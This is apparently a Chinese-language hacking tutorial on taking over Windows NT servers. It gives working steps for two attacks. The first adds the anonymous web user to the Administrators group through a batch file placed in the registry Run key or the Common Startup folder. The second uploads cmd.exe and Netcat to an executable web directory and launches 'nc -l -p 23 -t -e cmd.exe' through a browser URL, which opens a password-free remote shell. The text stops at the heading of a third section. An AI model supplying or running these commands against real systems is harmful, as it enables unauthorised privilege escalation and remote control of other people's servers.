操作Windows NT的Administrator权限

核心提示：一、通过修改注册表凡是具有登录NT本机的用户，例如IUSR_machine，操作Windows NT的Administrator权限，都具有对 HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCurrentVersionRun 项的可读可写权限，该用户可以远程访问这个项，它可以构建任

一、通过修改注册表

凡是具有登录NT本机的用户，例如IUSR_machine，都具有对 HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCurrentVersionRun 项的可读可写权限，该用户可以远程访问这个项。比如，他可以创建一个bat文件，文件内容为：cmd.exe /c net localgroup administrators IUSR_machine /add，把该文件copy到winnt目录下，然后在注册表上述的项添加一个数值，指向这个文件。

那么，当下次Admin登录到该机器上时，就会自动把IUSR_machine添加到Administrators组。

另，注册表键HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersCommon Startup 也可以这么做。

二、自建Telnet服务在NT上执行指令

要求用户有文件上传权限，而且该目录位于web目录下，该目录允许执行，下面是具体步骤。

假设你的目录是www.xxx.com/frankie，那么，把cmd.exe(位于C:winntsystem32cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去。

然后，在浏览器端输入：

http://www.xxx.com/frankie/cmd.e ... 20-t%20-e%20cmd.exe

这时候，你的浏览器将停止不动，实际上，Server上的Telnet的服务已经产生了。

这时，用Telnet连接www.xxx.com的23端口。你发现，不用密码，不用登陆，对方C:提示符已经出现在你的眼前！更妙的是，这个Telnet server是一个一次性的服务，当客户端一退出，该服务也将终止。

Netcat不同于一般的特洛伊木马，它可以构建任何的TCP连接服务。在浏览器端输入上述的字符串，等价于在NT的Dos方式下输入

nc -l -p 23 -t -e cmd.exe

这将把cmd.exe绑定到23端口上。

三、入侵NTserver典型途径V2.0